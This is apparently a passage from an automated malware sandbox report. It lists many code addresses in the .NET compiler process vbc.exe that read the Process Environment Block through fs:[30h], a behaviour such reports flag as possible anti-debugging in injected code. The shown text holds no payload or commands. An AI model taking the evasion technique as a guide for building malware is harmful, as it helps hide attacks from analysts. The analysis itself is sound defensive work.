                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FE53E mov eax, dword ptr fs:[00000030h]4_2_055FE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FE53E mov eax, dword ptr fs:[00000030h]4_2_055FE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FE53E mov eax, dword ptr fs:[00000030h]4_2_055FE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FE53E mov eax, dword ptr fs:[00000030h]4_2_055FE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FE53E mov eax, dword ptr fs:[00000030h]4_2_055FE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05666500 mov eax, dword ptr fs:[00000030h]4_2_05666500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4500 mov eax, dword ptr fs:[00000030h]4_2_056A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4500 mov eax, dword ptr fs:[00000030h]4_2_056A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4500 mov eax, dword ptr fs:[00000030h]4_2_056A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4500 mov eax, dword ptr fs:[00000030h]4_2_056A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4500 mov eax, dword ptr fs:[00000030h]4_2_056A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4500 mov eax, dword ptr fs:[00000030h]4_2_056A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4500 mov eax, dword ptr fs:[00000030h]4_2_056A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0535 mov eax, dword ptr fs:[00000030h]4_2_055E0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0535 mov eax, dword ptr fs:[00000030h]4_2_055E0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0535 mov eax, dword ptr fs:[00000030h]4_2_055E0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0535 mov eax, dword ptr fs:[00000030h]4_2_055E0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0535 mov eax, dword ptr fs:[00000030h]4_2_055E0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0535 mov eax, dword ptr fs:[00000030h]4_2_055E0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D65D0 mov eax, dword ptr fs:[00000030h]4_2_055D65D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560C5ED mov eax, dword ptr fs:[00000030h]4_2_0560C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560C5ED mov eax, dword ptr fs:[00000030h]4_2_0560C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560E5CF mov eax, dword ptr fs:[00000030h]4_2_0560E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560E5CF mov eax, dword ptr fs:[00000030h]4_2_0560E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A5D0 mov eax, dword ptr fs:[00000030h]4_2_0560A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A5D0 mov eax, dword ptr fs:[00000030h]4_2_0560A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FE5E7 mov eax, dword ptr fs:[00000030h]4_2_055FE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FE5E7 mov eax, dword ptr fs:[00000030h]4_2_055FE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FE5E7 mov eax, dword ptr fs:[00000030h]4_2_055FE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FE5E7 mov eax, dword ptr fs:[00000030h]4_2_055FE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FE5E7 mov eax, dword ptr fs:[00000030h]4_2_055FE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FE5E7 mov eax, dword ptr fs:[00000030h]4_2_055FE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FE5E7 mov eax, dword ptr fs:[00000030h]4_2_055FE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FE5E7 mov eax, dword ptr fs:[00000030h]4_2_055FE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D25E0 mov eax, dword ptr fs:[00000030h]4_2_055D25E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056505A7 mov eax, dword ptr fs:[00000030h]4_2_056505A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056505A7 mov eax, dword ptr fs:[00000030h]4_2_056505A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056505A7 mov eax, dword ptr fs:[00000030h]4_2_056505A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D2582 mov eax, dword ptr fs:[00000030h]4_2_055D2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D2582 mov ecx, dword ptr fs:[00000030h]4_2_055D2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05604588 mov eax, dword ptr fs:[00000030h]4_2_05604588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F45B1 mov eax, dword ptr fs:[00000030h]4_2_055F45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F45B1 mov eax, dword ptr fs:[00000030h]4_2_055F45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560E59C mov eax, dword ptr fs:[00000030h]4_2_0560E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C645D mov eax, dword ptr fs:[00000030h]4_2_055C645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F245A mov eax, dword ptr fs:[00000030h]4_2_055F245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565C460 mov ecx, dword ptr fs:[00000030h]4_2_0565C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560E443 mov eax, dword ptr fs:[00000030h]4_2_0560E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560E443 mov eax, dword ptr fs:[00000030h]4_2_0560E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560E443 mov eax, dword ptr fs:[00000030h]4_2_0560E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560E443 mov eax, dword ptr fs:[00000030h]4_2_0560E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560E443 mov eax, dword ptr fs:[00000030h]4_2_0560E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560E443 mov eax, dword ptr fs:[00000030h]4_2_0560E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560E443 mov eax, dword ptr fs:[00000030h]4_2_0560E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560E443 mov eax, dword ptr fs:[00000030h]4_2_0560E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FA470 mov eax, dword ptr fs:[00000030h]4_2_055FA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FA470 mov eax, dword ptr fs:[00000030h]4_2_055FA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FA470 mov eax, dword ptr fs:[00000030h]4_2_055FA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0568A456 mov eax, dword ptr fs:[00000030h]4_2_0568A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05656420 mov eax, dword ptr fs:[00000030h]4_2_05656420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05656420 mov eax, dword ptr fs:[00000030h]4_2_05656420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05656420 mov eax, dword ptr fs:[00000030h]4_2_05656420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05656420 mov eax, dword ptr fs:[00000030h]4_2_05656420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05656420 mov eax, dword ptr fs:[00000030h]4_2_05656420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05656420 mov eax, dword ptr fs:[00000030h]4_2_05656420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05656420 mov eax, dword ptr fs:[00000030h]4_2_05656420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05608402 mov eax, dword ptr fs:[00000030h]4_2_05608402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05608402 mov eax, dword ptr fs:[00000030h]4_2_05608402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05608402 mov eax, dword ptr fs:[00000030h]4_2_05608402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CC427 mov eax, dword ptr fs:[00000030h]4_2_055CC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CE420 mov eax, dword ptr fs:[00000030h]4_2_055CE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CE420 mov eax, dword ptr fs:[00000030h]4_2_055CE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CE420 mov eax, dword ptr fs:[00000030h]4_2_055CE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D04E5 mov ecx, dword ptr fs:[00000030h]4_2_055D04E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056044B0 mov ecx, dword ptr fs:[00000030h]4_2_056044B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565A4B0 mov eax, dword ptr fs:[00000030h]4_2_0565A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0568A49A mov eax, dword ptr fs:[00000030h]4_2_0568A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D64AB mov eax, dword ptr fs:[00000030h]4_2_055D64AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D0750 mov eax, dword ptr fs:[00000030h]4_2_055D0750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560674D mov esi, dword ptr fs:[00000030h]4_2_0560674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560674D mov eax, dword ptr fs:[00000030h]4_2_0560674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560674D mov eax, dword ptr fs:[00000030h]4_2_0560674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D8770 mov eax, dword ptr fs:[00000030h]4_2_055D8770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0770 mov eax, dword ptr fs:[00000030h]4_2_055E0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0770 mov eax, dword ptr fs:[00000030h]4_2_055E0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0770 mov eax, dword ptr fs:[00000030h]4_2_055E0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0770 mov eax, dword ptr fs:[00000030h]4_2_055E0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0770 mov eax, dword ptr fs:[00000030h]4_2_055E0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0770 mov eax, dword ptr fs:[00000030h]4_2_055E0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0770 mov eax, dword ptr fs:[00000030h]4_2_055E0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0770 mov eax, dword ptr fs:[00000030h]4_2_055E0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0770 mov eax, dword ptr fs:[00000030h]4_2_055E0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0770 mov eax, dword ptr fs:[00000030h]4_2_055E0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0770 mov eax, dword ptr fs:[00000030h]4_2_055E0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0770 mov eax, dword ptr fs:[00000030h]4_2_055E0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05654755 mov eax, dword ptr fs:[00000030h]4_2_05654755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612750 mov eax, dword ptr fs:[00000030h]4_2_05612750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612750 mov eax, dword ptr fs:[00000030h]4_2_05612750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565E75D mov eax, dword ptr fs:[00000030h]4_2_0565E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560C720 mov eax, dword ptr fs:[00000030h]4_2_0560C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560C720 mov eax, dword ptr fs:[00000030h]4_2_0560C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D0710 mov eax, dword ptr fs:[00000030h]4_2_055D0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564C730 mov eax, dword ptr fs:[00000030h]4_2_0564C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560273C mov eax, dword ptr fs:[00000030h]4_2_0560273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560273C mov ecx, dword ptr fs:[00000030h]4_2_0560273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560273C mov eax, dword ptr fs:[00000030h]4_2_0560273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560C700 mov eax, dword ptr fs:[00000030h]4_2_0560C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05600710 mov eax, dword ptr fs:[00000030h]4_2_05600710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565E7E1 mov eax, dword ptr fs:[00000030h]4_2_0565E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DC7C0 mov eax, dword ptr fs:[00000030h]4_2_055DC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056507C3 mov eax, dword ptr fs:[00000030h]4_2_056507C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D47FB mov eax, dword ptr fs:[00000030h]4_2_055D47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D47FB mov eax, dword ptr fs:[00000030h]4_2_055D47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F27ED mov eax, dword ptr fs:[00000030h]4_2_055F27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F27ED mov eax, dword ptr fs:[00000030h]4_2_055F27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F27ED mov eax, dword ptr fs:[00000030h]4_2_055F27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056847A0 mov eax, dword ptr fs:[00000030h]4_2_056847A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567678E mov eax, dword ptr fs:[00000030h]4_2_0567678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D07AF mov eax, dword ptr fs:[00000030h]4_2_055D07AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A660 mov eax, dword ptr fs:[00000030h]4_2_0560A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A660 mov eax, dword ptr fs:[00000030h]4_2_0560A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569866E mov eax, dword ptr fs:[00000030h]4_2_0569866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569866E mov eax, dword ptr fs:[00000030h]4_2_0569866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05602674 mov eax, dword ptr fs:[00000030h]4_2_05602674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EC640 mov eax, dword ptr fs:[00000030h]4_2_055EC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05606620 mov eax, dword ptr fs:[00000030h]4_2_05606620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05608620 mov eax, dword ptr fs:[00000030h]4_2_05608620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E260B mov eax, dword ptr fs:[00000030h]4_2_055E260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E260B mov eax, dword ptr fs:[00000030h]4_2_055E260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E260B mov eax, dword ptr fs:[00000030h]4_2_055E260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E260B mov eax, dword ptr fs:[00000030h]4_2_055E260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E260B mov eax, dword ptr fs:[00000030h]4_2_055E260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E260B mov eax, dword ptr fs:[00000030h]4_2_055E260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E260B mov eax, dword ptr fs:[00000030h]4_2_055E260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E609 mov eax, dword ptr fs:[00000030h]4_2_0564E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D262C mov eax, dword ptr fs:[00000030h]4_2_055D262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612619 mov eax, dword ptr fs:[00000030h]4_2_05612619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE627 mov eax, dword ptr fs:[00000030h]4_2_055EE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056506F1 mov eax, dword ptr fs:[00000030h]4_2_056506F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056506F1 mov eax, dword ptr fs:[00000030h]4_2_056506F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E6F2 mov eax, dword ptr fs:[00000030h]4_2_0564E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E6F2 mov eax, dword ptr fs:[00000030h]4_2_0564E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E6F2 mov eax, dword ptr fs:[00000030h]4_2_0564E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E6F2 mov eax, dword ptr fs:[00000030h]4_2_0564E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0560A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A6C7 mov eax, dword ptr fs:[00000030h]4_2_0560A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560C6A6 mov eax, dword ptr fs:[00000030h]4_2_0560C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D4690 mov eax, dword ptr fs:[00000030h]4_2_055D4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D4690 mov eax, dword ptr fs:[00000030h]4_2_055D4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056066B0 mov eax, dword ptr fs:[00000030h]4_2_056066B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D6154 mov eax, dword ptr fs:[00000030h]4_2_055D6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D6154 mov eax, dword ptr fs:[00000030h]4_2_055D6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CC156 mov eax, dword ptr fs:[00000030h]4_2_055CC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4164 mov eax, dword ptr fs:[00000030h]4_2_056A4164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4164 mov eax, dword ptr fs:[00000030h]4_2_056A4164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05664144 mov eax, dword ptr fs:[00000030h]4_2_05664144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05664144 mov eax, dword ptr fs:[00000030h]4_2_05664144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05664144 mov ecx, dword ptr fs:[00000030h]4_2_05664144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05664144 mov eax, dword ptr fs:[00000030h]4_2_05664144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05664144 mov eax, dword ptr fs:[00000030h]4_2_05664144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05668158 mov eax, dword ptr fs:[00000030h]4_2_05668158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05600124 mov eax, dword ptr fs:[00000030h]4_2_05600124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov eax, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov ecx, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov eax, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov eax, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov ecx, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov eax, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov eax, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov ecx, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov eax, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov ecx, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05690115 mov eax, dword ptr fs:[00000030h]4_2_05690115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567A118 mov ecx, dword ptr fs:[00000030h]4_2_0567A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567A118 mov eax, dword ptr fs:[00000030h]4_2_0567A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567A118 mov eax, dword ptr fs:[00000030h]4_2_0567A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567A118 mov eax, dword ptr fs:[00000030h]4_2_0567A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A61E5 mov eax, dword ptr fs:[00000030h]4_2_056A61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056001F8 mov eax, dword ptr fs:[00000030h]4_2_056001F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056961C3 mov eax, dword ptr fs:[00000030h]4_2_056961C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056961C3 mov eax, dword ptr fs:[00000030h]4_2_056961C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E1D0 mov eax, dword ptr fs:[00000030h]4_2_0564E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E1D0 mov eax, dword ptr fs:[00000030h]4_2_0564E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0564E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E1D0 mov eax, dword ptr fs:[00000030h]4_2_0564E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E1D0 mov eax, dword ptr fs:[00000030h]4_2_0564E1D0
